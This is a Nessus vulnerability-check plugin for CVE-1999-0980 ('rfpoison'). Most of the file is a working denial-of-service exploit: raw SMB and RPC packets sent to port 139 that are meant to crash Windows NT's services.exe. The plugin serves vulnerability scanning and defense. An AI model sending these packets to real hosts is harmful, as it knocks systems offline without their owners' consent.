code | #
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(10204);
script_version("1.29");
script_cvs_date("Date: 2018/11/15 20:50:28");
script_cve_id("CVE-1999-0980");
script_bugtraq_id(754);
script_name(english:"Microsoft Windows NT SCM Malformed Resource Enumeration Request DoS");
script_summary(english:"Crashes the remote host using the 'rfpoison' attack");
script_set_attribute(attribute:"synopsis", value:"The remote host is vulnerable to a denial of service.");
script_set_attribute(attribute:"description", value:
"An 'rfpoison' packet has been sent to the remote host. This packet is
supposed to crash the 'services.exe' process, making the system
unstable.");
script_set_attribute(attribute:"see_also", value:"https://support.microsoft.com/en-us/support/kb/articles/q231/4/57.asp");
script_set_attribute(attribute:"solution", value:
"Apply NT4 last service pack, or better, upgrade to Windows last
version.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"1999/10/31");
script_set_attribute(attribute:"plugin_publication_date", value:"1999/11/01");
script_set_attribute(attribute:"potential_vulnerability", value:"true");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
script_category(ACT_DENIAL);
script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.");
script_family(english:"Windows");
script_require_keys("Settings/ParanoidReport");
script_require_ports(139);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
if (report_paranoia < 2) audit(AUDIT_PARANOID);
version = get_kb_item("SMB/WindowsVersion");
if( version )
{
if(ereg(pattern:"[5-9]\.", string:version))exit(0);
}
if(get_port_state(139))
{
soc = open_sock_tcp(139);
if(soc)
{
#
# This is the result of rfp's secret program. I don't pretend
# I understand it, but it works.
#
data = raw_string(0x81,0x0,0x0,0x48,0x20,0x43,0x4b,0x46,0x44,0x45,0x4e,0x45,0x43,0x46,0x44,0x45,0x46,0x46,0x43,0x46,0x47,0x45,0x46,0x46,0x43,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x0,0x20,0x45,0x48,0x45,0x42,0x46,0x45,0x45,0x46,0x45,0x4c,0x45,0x46,0x45,0x46,0x46,0x41,0x45,0x46,0x46,0x43,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,0x0,0x0,0x0,0x0,0x0);
send(socket:soc, data:data);
recv(socket:soc, length:1024);
data = raw_string(0x0,0x0,0x0,0xa4,0xff,0x53,0x4d,0x42,0x72,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xf4,0x1,0x0,0x0,0x1,0x0,0x0,0x81,0x0,0x2,0x50,0x43,0x20,0x4e,0x45,0x54,0x57,0x4f,0x52,0x4b,0x20,0x50,0x52,0x4f,0x47,0x52,0x41,0x4d,0x20,0x31,0x2e,0x30,0x0,0x2,0x4d,0x49,0x43,0x52,0x4f,0x53,0x4f,0x46,0x54,0x20,0x4e,0x45,0x54,0x57,0x4f,0x52,0x4b,0x53,0x20,0x31,0x2e,0x30,0x33,0x0,0x2,0x4d,0x49,0x43,0x52,0x4f,0x53,0x4f,0x46,0x54,0x20,0x4e,0x45,0x54,0x57,0x4f,0x52,0x4b,0x53,0x20,0x33,0x2e,0x30,0x0,0x2,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x31,0x2e,0x30,0x0,0x2,0x4c,0x4d,0x31,0x2e,0x32,0x58,0x30,0x30,0x32,0x0,0x2,0x53,0x61,0x6d,0x62,0x61,0x0,0x2,0x4e,0x54,0x20,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x20,0x31,0x2e,0x30,0x0,0x2,0x4e,0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x0);
send(socket:soc, data:data);
recv(socket:soc, length:1024);
data = raw_string(0x0,0x0,0x0,0x54,0xff,0x53,0x4d,0x42,0x73,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xf4,0x1,0x0,0x0,0x1,0x0,0xd,0xff,0x0,0x0,0x0,0xff,0xff,0x2,0x0,0xf4,0x1,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x17,0x0,0x0,0x0,0x57,0x4f,0x52,0x4b,0x47,0x52,0x4f,0x55,0x50,0x0,0x55,0x6e,0x69,0x78,0x0,0x53,0x61,0x6d,0x62,0x61,0x0);
send(socket:soc, data:data);
recv(socket:soc, length:1024);
data = raw_string(0x0,0x0,0x0,0x42,0xff,0x53,0x4d,0x42,0x75,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xf4,0x1,0x0,0x8,0x1,0x0,0x4,0xff,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x17,0x0,0x0,0x5c,0x5c,0x2a,0x53,0x4d,0x42,0x53,0x45,0x52,0x56,0x45,0x52,0x5c,0x49,0x50,0x43,0x24,0x0,0x49,0x50,0x43,0x0);
send(socket:soc, data:data);
recv(socket:soc, length:1024);
data = raw_string(0x0,0x0,0x0,0x5b,0xff,0x53,0x4d,0x42,0xa2,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x8,0xf4,0x1,0x0,0x8,0x1,0x0,0x18,0xff,0x0,0x0,0x0,0x0,0x7,0x0,0x6,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x9f,0x1,0x2,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x3,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0x0,0x8,0x0,0x5c,0x73,0x72,0x76,0x73,0x76,0x63,0x0);
send(socket:soc, data:data);
recv(socket:soc, length:1024);
data = raw_string(0x0,0x0,0x0,0x94,0xff,0x53,0x4d,0x42,0x25,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x8,0xf4,0x1,0x0,0x8,0x1,0x0,0x10,0x0,0x0,0x48,0x0,0x0,0x0,0x48,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x4c,0x0,0x48,0x0,0x4c,0x0,0x2,0x0,0x26,0x0,0x0,0x8,0x51,0x0,0x5c,0x50,0x49,0x50,0x45,0x5c,0x0,0x0,0x0,0x5,0x0,0xb,0x0,0x10,0x0,0x0,0x0,0x48,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x30,0x16,0x30,0x16,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0xc8,0x4f,0x32,0x4b,0x70,0x16,0xd3,0x1,0x12,0x78,0x5a,0x47,0xbf,0x6e,0xe1,0x88,0x3,0x0,0x0,0x0,0x4,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x8,0x0,0x2b,0x10,0x48,0x60,0x2,0x0,0x0,0x0);
send(socket:soc, data:data);
recv(socket:soc, length:1024);
data = raw_string(0x0,0x0,0x0,0xa4,0xff,0x53,0x4d,0x42,0x25,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x8,0xf4,0x1,0x0,0x8,0x1,0x0,0x10,0x0,0x0,0x58,0x0,0x0,0x0,0x58,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x4c,0x0,0x58,0x0,0x4c,0x0,0x2,0x0,0x26,0x0,0x0,0x8,0x61,0x0,0x5c,0x50,0x49,0x50,0x45,0x5c,0x0,0x0,0x0,0x5,0x0,0x0,0x3,0x10,0x0,0x0,0x0,0x58,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0x48,0x0,0x0,0x0,0x0,0x0,0xf,0x0,0x1,0x0,0x0,0x0,0xd,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xd,0x0,0x0,0x0,0x5c,0x0,0x5c,0x0,0x2a,0x0,0x53,0x0,0x4d,0x0,0x42,0x0,0x53,0x0,0x45,0x0,0x52,0x0,0x56,0x0,0x45,0x0,0x52,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0);
send(socket:soc, data:data);
recv(socket:soc, length:1024);
security_hole(port:139);
close(soc);
}
}
|